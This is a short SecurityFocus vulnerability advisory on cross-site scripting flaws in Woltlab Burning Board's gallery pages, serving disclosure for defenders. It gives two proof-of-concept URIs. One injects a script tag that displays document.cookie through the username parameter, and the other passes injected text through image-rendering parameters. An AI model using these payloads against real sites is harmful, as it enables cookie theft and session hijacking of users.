Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Woltlab Burning Board Multiple Cross-Site Scripting Vulnerabilities


These issues can be exploited using a web client.

The following proof of concept URI are available:
http://www.example.com/21new/galerie_index.php?action=count&gal_catid=5&tcase=2&gal_id=35&userid=1&username="><script>alert(document.cookie)</script>

http://www.example.com/21new/galerie_data/galerie_onfly.php?abild=9997_mr2_2f2f_blue.jpg&width=600&show=2&inpic=Patriotic%20Hackers%20:=))&col=50&size=10&left=1000&heigh
t=100&vert=0&inpic2=Patriotic%20Hackers&nocomp=0







 

Privacy Statement
Copyright 2009, SecurityFocus